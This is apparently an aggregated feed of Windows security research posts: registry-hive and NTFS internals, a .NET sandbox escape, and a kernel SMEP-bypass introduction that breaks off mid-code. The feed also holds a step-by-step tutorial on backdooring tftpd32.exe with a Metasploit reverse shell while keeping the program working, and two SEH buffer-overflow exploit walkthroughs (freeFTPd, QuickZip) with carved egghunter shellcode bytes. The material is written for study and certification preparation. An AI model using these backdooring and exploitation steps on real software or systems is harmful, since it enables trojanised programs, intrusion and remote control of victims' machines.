The system call in question is NtLoadKey3. According to j00ru's system call table this was introduced in Windows 10 2004; however, it's at least in Windows 10 1909 as well. As the name suggests (if you're me at least) this loads a Registry Key Hive to an attachment point. This functionality has been extended over time, originally there was only NtLoadKey, then NtLoadKey2 was introduced in XP I believe to add some flags. Then NtLoadKeyEx was introduced to add things like explicit Trusted Hive support to mitigate cross hive symbolic link attacks (which is all j00ru and Gynvael's fault). And now finally NtLoadKey3. I've no idea why it went to 2, then to Ex, then back to 3; maybe it's some new Microsoft counting system. NtLoadKeyEx is partially exposed through the Win32 RegLoadKey and RegLoadAppKey APIs, although they only expose a subset of the system call's functionality.

Okay, so what bug class is NtLoadKey3 trying to mitigate? One of the problematic behaviors of loading a full Registry Hive (rather than a Per-User Application Hive) is you need to have SeRestorePrivilege* on the caller's Effective Token. SeRestorePrivilege is only granted to Administrators, so in order to call the API successfully you can't be impersonating a low-privileged user. However, the API can also create files when loading the hive file. This includes the hive file itself as well as the recovery log files.

* Don't pay attention to the documentation for RegLoadKey which claims you also need SeBackupPrivilege. Maybe it was required at some point, but it isn't any more.

When loading a system hive such as HKLM\SOFTWARE this isn't an issue as these hives are stored in an Administrator only location (c:\windows\system32\config if you're curious) but sometimes the hives are loaded from user-accessible locations such as from the user's profile or for Desktop Bridge support. In a user accessible location you can use symbolic link tricks to force the logs file to be written to arbitrary locations, and to make matters worse the Security Descriptor of the primary hive file is copied to the log file so it'll be accessible afterwards. An example of just this bug, in this case in Desktop Bridge, is issue 1492 (and 1554 as they didn't fix it properly (╯°□°)╯︵ ┻━┻).

NtLoadKey3 fixes this by introducing an additional parameter to specify an Access Token which will be impersonated when creating any files. This way the check for SeRestorePrivilege can use the caller's Access Token, but any "dangerous" operation will use the user's Token. Of course they could have probably implemented this by adding a new flag which will check the caller's Primary Token for the privilege like they do for SeImpersonatePrivilege and SeAssignPrimaryTokenPrivilege but what do I know...

Used appropriately this should completely mitigate the poor design of the system call. For example, the User Profile service now uses NtLoadKey3 when loading the hives from the user's profile. How do you call it yourself? I couldn't find any documentation obviously, and even in the usual locations such as OLE32's private symbols there doesn't seem to be any structure data, so I made a best guess with the following:

Notice that the TrustKey and Event handles from NtLoadKeyEx have also been folded up into a list of handle values. Perhaps someone wasn't sure if they ever needed to extend the system call whether to go for NtLoadKey4 or NtLoadKeyExEx so they avoided the decision by making the system call more flexible. Also the final parameter, which is also present in NtLoadKeyEx is seemingly unused, or I'm just incapable of tracking down when it gets referenced. Process Hacker's header files claim it's for an IO_STATUS_BLOCK pointer, but I've seen no evidence that's the case.

It'd be really awesome if in this new, sharing and caring Microsoft that they, well shared and cared more often, especially for features important to securing third party applications. TBH I think they're more focused on bringing Wayland to WSL2 or shoving a new API set down developers' throats than documenting things like this.

Distrusting the patch: a run through my first LPE 0-day, from command injection to path traversal

21 May 2020 at 00:00
Intro - TL;DR On April 29th, exploit-db published a Local Privilege Escalation (LPE) exploit for Druva InSync. Druva had by then implemented a patch on their latest InSync release, fixing the bug. However, the patch introduced an additional bug, paving the way for further exploitation and making it possible for a local low-privileged user to obtain SYSTEM level privileges. A team from Tenable Research and I concurrently discovered this new vulnerability, resulting in a new CVE (CVE-2020-5752) and exploit being published.

Writing Windows File System Drivers is Hard.

By: tiraniddo
20 May 2020 at 21:29
A tweet by @jonasLyk reminded me of a bug I found in NTFS a few months back, which I've verified still exists in Windows 10 2004. As far as I can tell it's not directly usable to circumvent security but it feels like a bug which could be used in a chain. NTFS is a good demonstration of how complex writing a FS driver is on Windows, so it's hardly surprising that so many weird edges cases pop up over time.

The issue in this case was related to the default Security Descriptor (SD) assignment when creating a new Directory. If you understand anything about Windows SDs you'll know it's possible to specify the inheritance rules through either the CONTAINER_INHERIT_ACE and/or OBJECT_INHERIT_ACE ACE flags. These flags represent whether the ACE should be inherited from a parent directory if the new entry is either a Directory or a File. Let's look at the code which NTFS uses to assign security to a new file and see if you can spot the bug?

The code uses SeAssignSecurityEx to create the new SD based on the Parent SD and any explicit SD from the caller. For inheritance to work you can't specify an explicit SD, so we can ignore that. Whether SeAssignSecurityEx applies the inheritance rules for a Directory or a File depends on the value of the IsDirectoryObject parameter. This is set to TRUE if the FILE_DIRECTORY_FILE options flag was passed to NtCreateFile. That seems fine, you can't create a Directory if you don't specify the FILE_DIRECTORY_FILE flag, if you don't specify a flag then a File will be created by default.

But wait, that's not true at all. If you specify a name of the form ABC::$INDEX_ALLOCATION then NTFS will create a Directory no matter what flags you specify. Therefore the bug is, if you create a directory using the $INDEX_ALLOCATION trick then the new SD will inherit as if it was a File rather than a Directory. We can verify this behavior from the command prompt.

C:\> mkdir ABC
C:\> icacls ABC /grant "INTERACTIVE":(CI)(IO)(F)
C:\> icacls ABC /grant "NETWORK":(OI)(IO)(F)

First we create a directory ABC and grant two ACEs: one for the INTERACTIVE group which will inherit on a Directory, the other for NETWORK which will inherit on a File.

C:\> echo "Hello" > ABC\XYZ::$INDEX_ALLOCATION
Incorrect function.

We then create the sub-directory XYZ using the $INDEX_ALLOCATION trick. We can be sure it worked as CMD prints "Incorrect function" when it tries to write "Hello" to the directory object.

C:\> icacls ABC\XYZ
ABC\XYZ NT AUTHORITY\NETWORK:(I)(F)
        NT AUTHORITY\SYSTEM:(I)(F)
        BUILTIN\Administrators:(I)(F)

Dumping the SD for the XYZ sub-directory we see the ACEs were inherited based on it being a File, rather than a Directory as we can see an ACE for NETWORK rather than for INTERACTIVE. Finally we list ABC to verify it really is a directory.

C:\> dir ABC
 Volume in drive C has no label.
 Volume Serial Number is 9A7B-865C

 Directory of C:\ABC

2020-05-20  19:09    <DIR>          .
2020-05-20  19:09    <DIR>          ..
2020-05-20  19:05    <DIR>          XYZ


Is this useful? Honestly, probably not. The only scenario I could imagine would be if you can specify a path to a system service which creates a file in a location where inherited File access would grant access and inherited Directory access would not. This would allow you to create a Directory you can control, but it seems a bit of a stretch to be honest. If anyone can think of a good use for this let me or Microsoft know :-)

Still, it's interesting that this is another case where $INDEX_ALLOCATION isn't correctly verified when determining whether an object is a Directory or a File. Another good example was CVE-2018-1036, where you could create a new Directory with only FILE_ADD_FILE permission. Quite why this design decision was made to automatically create a Directory when using the stream type is unclear. I guess we might never know.


APC Series: User APC API

17 May 2020 at 00:00
Hey! Long time no see. Coronavirus makes it harder for me to write posts, I hope I’ll have the time to write - I have a lot I want to share! One of the things I did in the last few weeks is to explore the APC mechanism in Windows and I wanted to share some of my findings. The purpose of this series is to allow you to get a systematic understanding of APC internals.

Portable Executable (PE) backdooring and Address Space Layout Randomization (ASLR)

This blog will go over how to backdoor a Windows executable. The intent is to show how a Windows PE can be hijacked to introduce a reverse shell while still allowing the executable to maintain its functionality. We will also go over how ASLR provides a security feature that randomizes the base address of executables/DLLs and the positions of other memory segments like the stack and heap. This prevents exploits from reliably jumping to a certain function/piece of code.

This is why you shouldn't trust any executable that you introduce to your system without verifying its source or checksum.

References:

Address Space Layout Randomization (ASLR): https://en.wikipedia.org/wiki/Address_space_layout_randomization  

Executables:
tftpd32.exe - a free, open-source TFTP server that also includes a variety of other services, including DHCP, DNS and even syslog, and functions as a TFTP client as well
PsExec.exe - a command-line tool that lets you execute processes on remote systems and redirect console applications' output to the local system so that these applications appear to be running locally.

Tools:

Immunity Debugger (http://debugger.immunityinc.com/ID_register.py) 
LordPE (http://www.malware-analyzer.com/pe-tools) 
XVI32 (http://www.chmaas.handshake.de/delphi/freeware/xvi32/xvi32.htm)

~~~~~~~~~//*******//~~~~~~~~~

0x0 - Adding a New Section...Code Cave

There are basically two (or more?) ways to get a code cave: (1) find available address space, or (2) add a new executable section.

"The concept of a code cave is often employed by hackers and reverse engineers to execute arbitrary code in a compiled program. It can be a helpful method to make modifications to a compiled program in the example of including additional dialog boxes, variable modifications or even the removal of software key validation checks. Often using a call instruction commonly found on many CPU architectures, the code jumps to the new subroutine and pushes the next address onto the stack. After execution of the subroutine a return instruction can be used to pop the previous location off of the stack into the program counter. This allows the existing program to jump to the newly added code without making significant changes to the program flow itself."

(1) Finding a code cave using backdoor-factory

(2) Using LordPE to add a new executable section.


For this blog, we will add a new section. As seen above, I added a section with a virtual size of 1000 and a raw size of 400. Also note that the virtual offset is 0004B000, as we will need this value to calculate the Relative Virtual Address (RVA). Since ASLR is enabled, we will use RVAs in order to dynamically do our jumps and address redirections.

0x1 - Entry point and New Section address

Using Immunity Debugger, we get the address of the new section (from here on this will be called the code cave)

We can see that the address is currently pointing to 010AB000; however, the 2 higher bytes of the address are irrelevant due to ASLR.


We can see the entry point once we open up tftpd32.exe in Immunity Debugger and verify the memory map. We will be hijacking the first instruction to make the jump to our code cave. Also, note that we will need to reintroduce these two instructions after the backdoor.


If ASLR were not enabled, we could have easily done a jmp 010AB000. That said, we will need to do some calculations to always hit the code cave regardless of whether its address is randomized.
To calculate the RVA, we will need the virtual offset and the entry point.



4B000 (VOffset) - 1208C (EntryPoint) = 38F74. This means that we will do a jmp 38F74.

Using nasm_shell.rb, we generate the following opcodes.


Our first instruction will be updated with E9 6F8F0300 which will do a jump to our code cave.
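
You can sanity-check that encoding with a few lines of C: E9 is a near jmp with a 32-bit displacement relative to the end of the 5-byte instruction, so the displacement is the code cave RVA minus (entry point RVA + 5). This is just a verification helper, not part of the backdooring process itself.

#include <stdio.h>
#include <string.h>
#include <stdint.h>

int main(void) {
    uint32_t entry_rva = 0x1208C;   // original entry point RVA
    uint32_t cave_rva  = 0x4B000;   // virtual offset of the new section
    int32_t  rel32     = (int32_t)(cave_rva - (entry_rva + 5));

    unsigned char jmp[5] = { 0xE9 };
    memcpy(&jmp[1], &rel32, 4);     // little-endian displacement

    for (int i = 0; i < 5; i++)
        printf("%02X ", jmp[i]);    // prints: E9 6F 8F 03 00
    printf("\n");
    return 0;
}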


...if we reload the program, ASLR kicks in as we can see the higher 2 bytes have changed. The same opcodes but different address.


We take the jump and it lands us at the beginning of our code cave.


0x2 - Backdoor/Reverse Shell Code

Once in our code cave, we will add a Metasploit reverse shellcode

We will create the payload in hex format and binary copy it to the program using immunity debugger.


Before the reverse shell can be copied in, all the registers and flags have to be saved, which can be done with the PUSHAD and PUSHFD instructions. This is needed to maintain the integrity of the original program execution.


Once the reverse shellcode is added, the registers and flags are restored to their original state using POPFD and POPAD. However, before that, we need to adjust the value of ESP to point back to the original stack/ESP value.

In my case, here are the ESP values

Before shellcode: 0025F908
After shellcode: 0025F70C


We will need to add 1FC to the ESP to align it, then execute the POPFD and POPAD instructions to restore the registers and flags


At this point, if we add a breakpoint at the end of our shellcode and run the program...we should get a reverse shell to our Kali netcat listener.

As you can see, we have successfully hijacked code execution and redirected it to our code cave containing our reverse shellcode.

0x3 - Restoring Original Program Instructions

Remember the two instructions at the entry point before they were hijacked? We will now need to restore these two instructions so the program can run as intended.


Keep in mind that we are still dealing with ASLR, which means we will need to calculate the RVA once again.

0096 BF15 - 0095 0000 = RVA 1 BF15 (this will be our CALL RVA_1 BF15) (additional offset by 10000)

0096 2091 - 0095 0000 = RVA 1 2091 (this will be our JMP RVA_1 2091)  (additional offset by 10000)


At address 010AB169 or RVA 4B169 (virtual offset + 169)

 

RVA_4B169 - RVA_1 BF15 



At address 010AB16E or RVA 4B16E (virtual offset + 16E)


RVA_4B16E- RVA_1 2091




Add these instructions or opcodes as shown below:


And we are done...somewhat.

0x4 - WaitForSingleObject

Our reverse shell calls the WaitForSingleObject function, which pushes an ESI value of -1. As a result, tftpd32.exe will not execute until we exit the reverse shell. This means that we will need to change the ESI value from -1 to 0.

We will trace code execution in immunity debugger using 'Trace Over' command.

Line 5 has a DEC ESI instruction, which makes ESI = FFFFFFFF. This means that all we need to do is cancel the DEC ESI instruction (making it a NOP works just fine)!




We should now be able to successfully execute the program while it also simultaneously sends a reverse shell to Kali.



Thanks for reading.

freeFTPd-1.0.10 SEH Based Buffer Overflow

Kali Linux
Windows Vista
freeFTPD 1.0.10

Original Author, POC, and vulnerable software: https://www.exploit-db.com/exploits/27747


~~~~~~//******//~~~~~~

Vulnerable program:




Initial Proof-of-Concept 


...and we get our initial crash where our SEH handler and nSEH have been overwritten with 41s.



Calculating the offset values

As usual, we use Metasploit's pattern_create.rb and pattern_offset.rb




We update our POC with the following offset values


...and we verify that we hit the correct offset values as shown with the Cs and Bs


POP-POP-RET 


Since this is a SEH based buffer overflow, as usual we will need a POP-POP-RET address.

I am using mona.py to find this address.

Also, note that we will need to find an address from a module with SAFESEH and ASLR disabled.

We will use address 0x0041B865



Again, we update our POC with our SEH Handler redirect address


We send our exploit up and we have successfully redirected code execution as we hit our POP-POP-RET address.


We follow the POP-POP-RET and we hit our nSEH which is just right below our As

Note: We currently do not see our Ds.


...however, if we scroll further down, we can see that our Ds are still loaded in memory. We just need to find them... aka an egghunter.


First Jump

Since our first jump is limited to just 4 bytes, we will do a 2 byte reverse short jmp

EB 80 or jmp short reverse 128 bytes.

We update our nSEH with EB 80 and added 2 more NOPs (not necessary) to complete the 4 bytes.



We fire up the POC one more time, take the pop-pop-ret, and hit our first jump



Restricted characters 


After going through the 256 hex characters, we found that 0xa is the only restricted character

So far, we have accomplished the following:

1. Successfully crashed the program and overwrote the SEH and nSEH
2. Calculated the offset values
3. Found POP-POP-RET address
4. Completed the first jump from nSEH which allows 127 bytes of address space


Egg...hunting!


Reminder...you can create an egghunter using mona.py


Note: I am using a slightly different egghunter shellcode.

We update our POC with our egghunter shellcode and add the egg in front of our Ds



Send the exploit up...take the first jump (EB 80) and we land on our NOP sled.

If we scroll down, our egghunter is just right below the NOP sled.

We let the egghunter execute while adding a breakpoint at JMP EDI to check the value of EDI.

Here we can see that we have successfully located our egg...all that we need to do now is add our reverse shellcode right after our egg.


At this point we are ready to add our reverse shell





QuickZip 4.60 SEH Based Buffer Overflow w/ Egghunter

Structured Exception Handling (SEH)Based Buffer Overflow Vulnerability

Kali Linux
Windows Vista
QuickZip 4.60


Bug found by: corelancod3r (http://corelan.be:8800)
Software Link: http://www.quickzip.org/downloads.html


GitHub:https://github.com/pyt3ra/QuickZip_4_60_SEH-Based-Buffer-Overflow

~~~~~~//******//~~~~~~

This is another SEH based buffer overflow with an egghunter implementation. A more detailed explanation that I wrote about an egghunter implementation can be found here: https://www.pyt3ra.com/2020/03/slae-assignment-3.html

You can find numerous write-ups about this vulnerability and exploit. This buffer overflow vulnerability gives us a good mix of shellcode encoding due to restricted characters, as well as an egghunter implementation.

I'm doing this as part of my preparation for the Offensive Security Certified Expert (OSCE) certification

0x0 - Setup

Our Proof-of-Concept creates a .zip file that we will access using QuickZip.





0x1 - Fuzzing

As usual, step one in exploit development is fuzzing. This allows us to examine how the program responds when we introduce an oversized buffer to it.

We will be using the fuzzer from corelan as shown below.


We examine the crash using Immunity Debugger and we can see that we have successfully overwritten the SEH handler with 41s.


0x2 - Calculating the offset

We will utilize Metasploit's pattern_create.rb and pattern_offset.rb

First, we create unique characters of 4068 bytes and update our POC



We check the SEH chain after the crash to get the offset values

SEH: 6B41396A
nSEH: 41386A41


Second, we calculate these values using pattern_offset.rb


Finally, we update our POC and verify if these values are correct.

If everything is correct, we should see Bs at byte 294 and Cs at byte 298.



Our values are correct as we see the 43s and 42s overwrite both SEH and nSEH respectively.


0x3 - Verifying Restricted Characters

At this point, we are now ready to find an address to redirect the SEH handler. However, before we waste our time looking for an address, we will need to verify first if there are restricted characters. 

First, I worked on the first 128 bytes (x01 to x7F)

I sent the characters to the program and carefully watched how the program responded to them. If a character gets mangled/truncated/changed, then it's a bad character.

After numerous tries, I was able to narrow down the restricted characters to the following:

'\x10\x0f\x14\x15\x2f\x3d\x3a\x5b'

Updated POC below:


Second, I worked with the other 128 bytes (x80 to xff)

Interestingly, hex characters 80 and above are changed to an arbitrary hex character.

I sent the following characters...


...and we see the following conversion in Immunity Debugger

The table below shows the conversion (not a complete list).



0x4 - POP-POP-RET address!

Now that we know which characters are not allowed, we are ready to find a POP-POP-RET address.

Lucky for us, Immunity Debugger's mona.py module enables an easier way to find a POP-POP-RET address. 

There were multiple addresses found.

Although not ideal since it has null bytes, we will be using address 00435133


We can verify that this is indeed a POP-POP-RET address by searching for it.


We can update our POC with this address and see if our SEH handler gets redirected to it. 

Note that the address has to be in little-endian.


We fire up the POC and we have successfully redirected the SEH handler as shown below:




…once we take the pop-pop-ret, we then get redirected to our nseh values (EBs)

Note that our Ds are nowhere to be found now; however, our As are easily accessible just above our nSEH. This means our initial jump will have to be a reverse jump to the beginning of our As, which should get us at least 127 bytes of address space to further jump to a bigger space (the Ds' location)


0x5 - First Jump


Normally, we would easily be able to do a reverse short jump of 80 (EB 80). However, note that any hex character of 80 or over is restricted and converts to a different hex character.

More info about jump shorts (forward and reverse) can be found here: https://thestarman.pcministry.com/asm/2bytejumps.htm

If we go back to our bad characters table… we can see that hex 89 and 9F translate to EB and 83 respectively.

89 -> EB
9F -> 83

Here's how the EB 83 instructions would work as shown in Immunity. 


We can now update our POC with our first jump


We see our EB 83 first jump in SEH chain


We take the pop-pop-ret and we successfully hit our first jump…from 0012FBB0 to 0012FB35
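
As a quick sanity check on the short-jump arithmetic: EB takes a signed 8-bit displacement relative to the end of the 2-byte instruction, so with the EB 83 sitting in the nSEH at 0012FBB0 (as in the screenshot) it lands exactly at 0012FB35. A small verification helper:

#include <stdio.h>
#include <stdint.h>

int main(void) {
    uint32_t jmp_addr = 0x0012FBB0;    // where the EB 83 bytes live (nSEH)
    int8_t   disp     = (int8_t)0x83;  // 0x83 as a signed byte is -125
    uint32_t target   = jmp_addr + 2 + disp;
    printf("jmp short lands at 0x%08X\n", target);   // 0x0012FB35
    return 0;
}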


0x6 - Second Jump - Egghunter

Remember that the address space for our Ds is missing now (still in memory). This is ideally where the reverse shellcode would be.

Note above that our dump doesn't show the address space where our Ds are anywhere near our As.

Just because we can't find it doesn't mean it is missing… this is where an egghunter shellcode comes into play.

Here's a write-up that I did about egghunter: https://www.pyt3ra.com/2020/03/slae-assignment-3.html

Mona.py also has a module to create an egghunter.

Note: I will be using a different egghunter

Due to restricted characters, we will need to carve out our egghunter shellcode so I will be using the egghunter shellcode that I used for OSCE prep (I spent way too much time carving them).

Also, note that I did another EB 83 at the beginning of our second jump to allow another 120+ bytes of address space as I noticed that the first jump wasn't enough space
  
Before we can start carving out the egghunter shellcode, we will need to align the ESP to point to the space below our first EB 08  at address 0012FB8D--this is where our egghunter shellcode will be decoded. 

We can see that ESP is currently pointed at 0012F574 and we want it to point to 0012FB8D


We will need to add 1561 to ESP


To align ESP, we need the following instructions:

PUSH ESP                   
POP EAX
ADD AX, 619
PUSH EAX
POP ESP

Keep in mind that we still need to avoid restricted characters...fortunately, the opcodes that correspond  to these instructions are not restricted

We execute the following instructions and we can see that our ESP now points to 0012FB8D


Again, we update our POC with our initial ESP realignment which will be the beginning of our egghunter shellcode


With our ESP aligned to where we want it to point....we can start carving out our egghunter shellcode.

Here's the original egghunter shellcode broken down into 4 bytes

#original egg hunter shellcode
\x68\x81\xcA\xFF
\x0F\x42\x52\x6A
\x02\x58\xCD\x2E
\x3C\x05\x5A\x74
\xEF\xb8\x54\x30
\x30\x57\x8b\xFA
\xAF\x75\xea\xAF
\x75\xE7\xFF\xE7

We will be using the EAX register to carve out the egghunter. Note that we need to zero out EAX first before we execute SUB instructions. We start from the last 4 bytes and work our way up.

zero_out_eax = "\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a"

This whole carving thing is straight black magic...it never ceases to amaze me.

#\x75\xe7\xff\xe7
#using hex/dword in windows calc
#0 - E7FFE775 = 1800 188B
#7950 5109 + 7950 5109 + 255F7679 = 1800 188B
#0 - 79505109 - 79505109 - 255F7679 = E7FFE775


These 4 bytes are encoded by doing some SUB instructions on EAX, then it gets pushed to the stack, and then they get decoded at the ESP address.
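
The arithmetic is easy to sanity-check in C, since unsigned 32-bit subtraction wraps around exactly like EAX does (values taken from the comments above):

#include <stdio.h>
#include <stdint.h>

int main(void) {
    uint32_t eax = 0;            // EAX has just been zeroed out
    eax -= 0x79505109;
    eax -= 0x79505109;
    eax -= 0x255F7679;
    printf("%08X\n", eax);       // prints E7FFE775, pushed as the bytes 75 E7 FF E7
    return 0;
}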



We will be doing this for the other 28 bytes

#\xaf\x75\xea\xaf
#using hex/dword in windows calc
#0 - AFEA75AF = 5015 8A51
#71094404 + 71094404  + 6E03 0249‬ =  5015 8A51
#0 - 71094404 - 71094404  - 6E03 0249 = AFEA75AF



\x30\x57\x8b\xfa
#using hex/dword in windows calc
#0 - FA8B 5730 = 0574 A8D0‬
#55093131 + 55093131  + 5B62 466E = 0574 A8D0‬
#0 - 55093131 - 55093131  - 5B62 466E = FA8B 5730


\xef\xb8\x54\x30
#using hex/dword in windows calc
#0 - 3054 B8EF = CFAB 4711
#56316666 +56316666  + 2348 7A45 = CFAB 4711
#0 - 56316666  - 56316666  - 2348 7A45 = 3054 B8EF



At this point, we have successfully carved out the first 16 bytes of our egghunter shellcode.

Note that we are getting close to our second EB 83 jmp… we will need to jump over this to get to the next 127 bytes of address space

I made a mistake on the ESP realignment that resulted in wasted address space. ESP should have been pointed to the end of our 41s; as the stack grows bigger, the addresses become smaller.

This means we need ESP to be pointing at address 0012FBAC



Adjusted ESP alignment


This gives us about 32 extra bytes of address space… every byte counts!

We finish up the first 128 bytes by adding the first half of our zero_out_eax instructions and adding a short jump of 10 bytes to go over the second EB 83 (I think we could have looped around too and just overwritten the first 16 bytes of our egghunter shellcode).



Our jump short brings us from address 0012FB2F to 0012FB3B and we successfully get over the second EB 83



Now we continue encoding the rest of our egghunter shellcode


#\x3c\x05\x5a\x74
#using hex/dword in windows calc
#0 - 745A053C = 8BA5 FAC4
#41214433 + 41214433 + 0963 725E = 8BA5 FAC4
#0 - 41214433 - 41214433 - 0963 725E = 745A053C


#\x02\x58\xcd\x2e
#using hex/dword in windows calc
#0 - 2ECD5802 = D132 A7FE
#657F3165 + 657F3165 + 06344534 =  D132 A7FE
#0 - 657F3165 - 657F3165 - 06344534 = 2ECD5802



Finally, we hit our last 4 bytes



That completes our egghunter shellcode…with literally 6 bytes left to spare with our address space

To test if our egghunter can find our egg, we add our egg "T00W" to the beginning of our Ds…and see if we can find it

...and we are successful. We found our Ds address space.



0x7 - Shellcode time!

I created a calc shellcode to see if we are able to pop calc.exe.


We go through our egghunter and add a breakpoint right before the jmp edi instruction and we can see that edi points to the beginning of our calc shellcode



Everything looks good; however, our shellcode just keeps crashing the program and doesn't spawn calc.exe

After spending some time researching, it looks like ESP has to be realigned.

We align ESP with the address of EDX... then align it to a 16-byte boundary

PUSH EDX
POP ESP
AND ESP, FFFFFFF0             ----> align ESP to a 16-byte boundary




I update the shellcode to a reverse shell…pop the exploit one more time and we get a reverse shell





Final POC in my GitHub.

Thanks for reading!

Old .NET Vulnerability #5: Security Transparent Compiled Expressions (CVE-2013-0073)

By: tiraniddo
7 May 2020 at 23:12
It's been a long time since I wrote a blog post about my old .NET vulnerabilities. I was playing around with some .NET code and found an issue when serializing delegates inside a CAS sandbox; I got a SerializationException thrown with the following text:

Cannot serialize delegates over unmanaged function pointers, 
dynamic methods or methods outside the delegate creator's assembly.
   
I couldn't remember if this has always been there or if it was new. I reached out on Twitter to my trusted friend on these matters, @blowdart, who quickly fobbed me off to Levi. But the take away is at some point the behavior of Delegate serialization was changed as part of a more general change to add Secure Delegates.

It was then I realized, that it's almost certainly (mostly) my fault that the .NET Framework has this feature and I dug out one of the bugs which caused it to be the way it is. Let's have a quick overview of what the Secure Delegate is trying to prevent and then look at the original bug.

.NET Code Access Security (CAS) as I've mentioned before when discussing my .NET PAC vulnerability allows a .NET "sandbox" to restrict untrusted code to a specific set of permissions. When a permission demand is requested the CLR will walk the calling stack and check the Assembly Grant Set for every Stack Frame. If there is any code on the Stack which doesn't have the required Permission Grants then the Stack Walk stops and a SecurityException is generated which blocks the function from continuing. I've shown this in the following diagram, some untrusted code tries to open a file but is blocked by a Demand for FileIOPermission as the Stack Walk sees the untrusted Code and stops.

View of a stack walk in .NET blocking a FileIOPermission Demand on an Untrusted Caller stack frame.

What has this to do with delegates? A problem occurs if an attacker can find some code which will invoke a delegate under asserted permissions. For example, in the previous diagram there was an Assert at the bottom of the stack, but the Stack Walk fails early when it hits the Untrusted Caller Frame.

However, as long as we have a delegate call, and the function the delegate calls is Trusted then we can put it into the chain and successfully get the privileged operation to happen.

View of a stack walk in .NET allowed due to replacing untrusted call frame with a delegate.

The problem with this technique is finding a trusted function we can wrap in a delegate which you can attach to something such a Windows Forms event handler, which might have the prototype:
void Callback(object obj, EventArgs e)

and would call the File.OpenRead function which has the prototype:

FileStream OpenRead(string path).

That's a pretty tricky thing to find. If you know C# you'll know about Lambda functions, could we use something like?

EventHandler f = (o,e) => File.OpenRead(@"C:\SomePath")

Unfortunately not, the C# compiler takes the lambda, generates an automatic class with that function prototype in your own assembly. Therefore the call to adapt the arguments will go through an Untrusted function and it'll fail the Stack Walk. It looks something like the following in CIL:

Turns out there's another way. See if you can spot the difference here.

Expression<EventHandler> lambda = (o,e) => File.OpenRead(@"C:\SomePath")
EventHandler f = lambda.Compile()

We're still using a lambda, surely nothing has changed? Well, let's look at the CIL.

That's just crazy. What's happened? The key is the use of Expression. When the C# compiler sees that type it decides that rather than create a delegate in your assembly it'll create something called an expression tree. That tree is then compiled into the final delegate. The important thing for the vulnerability I reported is this delegate was trusted as it was built using the AssemblyBuilder functionality which takes the Permission Grant Set from the calling Assembly. As the calling Assembly is the Framework code it got full trust. It wasn't trusted to Assert permissions (a Security Transparent function), but it also wouldn't block the Stack Walk either. This allows us to implement any arbitrary Delegate adapter to convert one Delegate call-site into calling any other API as long as you can do that under an Asserted permission set.

View of a stack walk in .NET allowed due to replacing untrusted call frame with a expression generated delegate.

I was able to find a number of places in WinForms which invoked Event Handlers while asserting permissions that I could exploit. The initial fix was to fix those call-sites, but the real fix came later, the aforementioned Secure Delegates.

Silverlight always had Secure delegates, it would capture the current CAS Permission set on the stack when creating them and add a trampoline if needed to the delegate to insert an Untrusted Stack Frame into the call. Seems this was later added to .NET. The reason that Serializing is blocked is because when the Delegate gets serialized this trampoline gets lost and so there's a risk of it being used to exploit something to escape the sandbox. Of course CAS is dead anyway.

The end result looks like the following:

View of a stack walk in .NET blocking a FileIOPermission Demand on an Untrusted Trampoline Stack Frame.

Anyway, these are the kinds of design decisions that were never full scoped from a security perspective. They're not unique to .NET, or Java, or anything else which runs arbitrary code in a "sandboxed" context including things JavaScript engines such as V8 or JSCore.


The Summer of PWN

By: h0mbre
5 May 2020 at 04:00

Summer Plans

Now that I've finished the HEVD series of posts, it's time for me to switch gears. The series became more of a chore as I progressed and the exercise felt quite silly for a few reasons. Primarily, there are so many fundamental binary exploitation concepts that I still don't know. Why was I spending so much time on very esoteric material when I hadn't even accomplished the basics? The material was tied closely to my wanting to take AWE with Offsec, but since that is not happening, I now get to focus on going back to the basics.

For the foreseeable future, I'm going to be working primarily on leveling up my pwn skills by doing CTF challenges, reversing, analyzing malware, and developing.

Some of the tools I’m going to be using this summer (I’ll update this as I go along):

I will be keeping a daily log of everything I do and will publish it so that those trying to accomplish similar goals can see what I tried. I'll also make a post at the end detailing what went right and what went wrong.

I’m taking a purposeful break from blogging so that I can focus on leveling up. Blogging takes a lot of my time and it’s interfering with my ability to put hours into getting better. I will hopefully be able to do a write-up detailing how I exploited a bug I found in another Windows kernel mode driver.

Keeping track of the Linux pwn challenge exploits here.

Until then, see you on the other side!

HEVD Exploits – Windows 10 x64 Stack Overflow SMEP Bypass

By: h0mbre
4 May 2020 at 04:00

Introduction

This is going to be my last HEVD blog post. These were all of the exploits I wanted to hit when I started this goal in late January. We did quite a few; there are definitely some interesting ones left on the table, and there are all of the Linux exploits as well. I'll speak more about future posts in a future post (haha). I used HackSys Extreme Vulnerable Driver 2.0 and Windows 10 Build 14393.rs1_release.160715-1616 for this exploit. Some of the newer Windows 10 builds were bugchecking with this technique.

All of the exploit code can be found here.

Thanks

  • To @Cneelis for having such great shellcode in his similar exploit on a different Windows 10 build here: https://github.com/Cn33liz/HSEVD-StackOverflowX64/blob/master/HS-StackOverflowX64/HS-StackOverflowX64.c
  • To @abatchy17 for his awesome blog post on his SMEP bypass here: https://www.abatchy.com/2018/01/kernel-exploitation-4
  • To @ihack4falafel for helping me figure out where to return to after running my shellcode.

And as this is the last HEVD blog post, thanks to everyone who got me this far. As I've said in every post so far, nothing I was doing was my own idea or technique; I was simply recreating their exploits (or at least trying to) in order to learn more about the bug classes and the Windows kernel. (More thoughts on this later in a future blog post).

SMEP

We’ve already completed a Stack Overflow exploit for HEVD on Windows 7 x64 here; however, the problem is that starting with Windows 8, Microsoft implemented a new mitigation by default called Supervisor Mode Execution Prevention (SMEP). SMEP detects kernel mode code running in userspace stops us from being able to hijack execution in the kernel and send it to our shellcode pointer residing in userspace.

Bypassing SMEP

Taking my cues from Abatchy, I decided to try and bypass SMEP by using a well-known ROP chain technique that utilizes segments of code in the kernel to disable SMEP and then heads to user space to call our shellcode.

In the linked material above, you see that the CR4 register is responsible for enforcing this protection and if we look at Wikipedia, we can get a complete breakdown of CR4 and what its responsibilities are:

Bit 20 (SMEP, Supervisor Mode Execution Protection Enable): if set, execution of code in a higher ring generates a fault.

So the 20th bit of the CR4 indicates whether or not SMEP is enforced. Since this vulnerability we’re attacking gives us the ability to overwrite the stack, we’re going to utilize a ROP chain consisting only of kernel space gadgets to disable SMEP by placing a new value in CR4 and then hit our shellcode in userspace.
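To make the bit math concrete, here is a small sketch (illustrative only, not part of the exploit; the starting value is just an example) of what clearing bit 20 of a CR4 value looks like:

#include <cstdint>
#include <cstdio>

int main() {
    const uint64_t SMEP_BIT = 1ULL << 20;                    // bit 20 of CR4 enables SMEP

    uint64_t cr4_with_smep = 0x170678;                       // example CR4 value with SMEP set
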